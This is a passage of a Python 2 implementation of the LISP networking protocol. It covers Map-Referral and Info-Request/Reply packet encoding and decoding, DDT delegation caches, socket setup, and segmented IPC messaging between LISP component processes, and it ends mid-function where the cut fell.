# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Referral Count| EID mask-len | ACT |A|I| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c |SigCnt | Map Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix ... |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |R| Loc/LCAF-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator ... |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_referral():
def __init__(self):
self.record_count = 0
self.nonce = 0
#enddef
def print_map_referral(self):
lprint("{} -> record-count: {}, nonce: 0x{}".format( \
bold("Map-Referral", False), self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REFERRAL << 28) | self.record_count
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.record_count = first_long & 0xff
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
return(packet)
#enddef
#endclass
#
# This is a DDT cache type data structure that holds information configured
# in the "lisp ddt-authoritative-prefix" and "lisp delegate" commands. The
# self.delegation_set[] is a list of lisp_ddt_node()s.
#
class lisp_ddt_entry():
def __init__(self):
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.uptime = lisp_get_timestamp()
self.delegation_set = []
self.source_cache = None
self.map_referrals_sent = 0
#enddef
def is_auth_prefix(self):
if (len(self.delegation_set) != 0): return(False)
if (self.is_star_g()): return(False)
return(True)
#enddef
def is_ms_peer_entry(self):
if (len(self.delegation_set) == 0): return(False)
return(self.delegation_set[0].is_ms_peer())
#enddef
def print_referral_type(self):
if (len(self.delegation_set) == 0): return("unknown")
ddt_node = self.delegation_set[0]
return(ddt_node.print_node_type())
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
def add_cache(self):
if (self.group.is_null()):
lisp_ddt_cache.add_cache(self.eid, self)
else:
ddt = lisp_ddt_cache.lookup_cache(self.group, True)
if (ddt == None):
ddt = lisp_ddt_entry()
ddt.eid.copy_address(self.group)
ddt.group.copy_address(self.group)
lisp_ddt_cache.add_cache(self.group, ddt)
#endif
if (self.eid.is_null()): self.eid.make_default_route(ddt.group)
ddt.add_source_entry(self)
#endif
#enddef
def add_source_entry(self, source_ddt):
if (self.source_cache == None): self.source_cache = lisp_cache()
self.source_cache.add_cache(source_ddt.eid, source_ddt)
#enddef
def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node():
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request():
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), self.nonce))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (lisp_ddt_map_requestQ.has_key(str(self.nonce))):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information following the EID-prefix:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info():
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
        # Add hostname as a null-terminated string with AFI 17 (LISP_AFI_NAME).
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += self.hostname + "\0"
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info():
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source():
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword and convert to binascii by byte-swapping and zero filling
# longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
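#
# Sizing note (editor's sketch): for LISP_SHA_1_96_ALG_ID the three pieces are
# zero-filled to 16, 16, and 8 hex characters, giving a 40-hex-character
# (160-bit) string; for LISP_SHA_256_128_ALG_ID the four 16-character pieces
# give a 64-hex-character (256-bit) string. Pieces whose hex representation is
# shorter than the field width are left-padded with "0" characters by zfill().
#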
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
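#
# Usage sketch (editor's example, addresses assumed): a numeric port string
# selects a network socket and a non-numeric string selects an AF_UNIX
# datagram socket named by that string.
#
#   lisp_open_listen_socket("0.0.0.0", "4342")   # IPv4 UDP socket on 4342
#   lisp_open_listen_socket("0::0", "4342")      # IPv6 UDP socket on 4342
#   lisp_open_listen_socket("", "lisp-itr")      # AF_UNIX socket "lisp-itr"
#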
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
def lisp_packet_ipc(packet, source, sport):
return(("packet@" + str(len(packet)) + "@" + source + "@" + str(sport) + \
"@" + packet))
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be source from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
return("control-packet@" + dest + "@" + str(dport) + "@" + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
def lisp_data_packet_ipc(packet, source):
return("data-packet@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_command_ipc(packet, source):
return("command@" + str(len(packet)) + "@" + source + "@@" + packet)
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
def lisp_api_ipc(source, data):
return("api@" + str(len(data)) + "@" + source + "@@" + data)
#enddef
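#
# Illustrative examples (editor's sketch, argument values assumed): the IPC
# builders above produce "@"-delimited strings such as the following.
#
#   lisp_packet_ipc(pkt, "lisp-itr", 4342) -> "packet@<len>@lisp-itr@4342@<pkt>"
#   lisp_command_ipc("show map-cache", "lisp-itr")
#                                      -> "command@14@lisp-itr@@show map-cache"
#   lisp_api_ipc("lisp-core", "{}")    -> "api@2@lisp-core@@{}"
#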
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in segments (1500 bytes, or 9000 bytes for control-packets)
# since the socket interface will not accept larger messages, and
# socket.setsockopt() won't allow us to increase SO_SNDBUF.
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find("control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error, e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
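#
# Segmentation sketch (editor's note, sizes taken from the code above): a
# 4000-byte "command@..." IPC message does not contain "control-packet", so
# ipc_len is 1500 and the message is sent as three sendto() calls of 1500,
# 1500, and 1000 bytes; a "control-packet@..." message uses 9000-byte segments.
#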
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = ""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + " "
offset += 8
length -= 4
    #endwhile
return(new)
#enddef
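#
# Example (editor's sketch, bytes assumed): a packet beginning with bytes
# 0x45 0x00 0x00 0x3c 0xab 0xcd is hexlified to "4500003cabcd" and formatted
# as "4500003c abcd " -- a whitespace after every 8 hex digits (4 bytes).
#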
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# If Map-Request/Reply RLOC-probe set TTL for outgoing packet to 255.
#
set_ttl = (LISP_RLOC_PROBE_TTL == 255)
if (set_ttl):
lisp_type = struct.unpack("B", packet[0])[0]
set_ttl = (lisp_type in [0x12, 0x28])
if (set_ttl): lisp_set_ttl(lisp_socket, LISP_RLOC_PROBE_TTL)
#endif
try: lisp_socket.sendto(packet, (address, port))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#
# Set back to default TTL.
#
if (set_ttl): lisp_set_ttl(lisp_socket, 64)
return
#enddef
#
# lisp_receive_segments
#
# Reassemble the remaining segments when the received IPC message was sent in
# pieces (see lisp_ipc()) because it is larger than one socket read can return.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
if (segment.find("packet@") == 0):
seg = segment.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# For every element in the array, insert a 0x40 ("@"). This is a bit-stuffing
# procedure. Only look at array elements with index 2 and above.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = ""
for segment in payload: packet += segment + "\x40"
return(packet[:-1])
#enddef
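#
# Example (editor's sketch): lisp_bit_stuff(["abc", "def"]) returns "abc@def",
# i.e. the payload fields that split("@") wrongly broke apart are rejoined
# with the 0x40 byte that was consumed by the split.
#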
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when the split array has fewer than 4 elements, we are receiving a
# fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
        # sender, then IP did it so it is assembled into a complete datagram
        # in this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
loop = False
while (assembled == False):
data = data.split("@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0]
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2]
port = data[3]
#
# If any of the data payload has a 0x40 byte (which is "@" in
            # ascii), we will confuse the IPC separator with real data.
            # So go to the payload and put back 0x40 where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
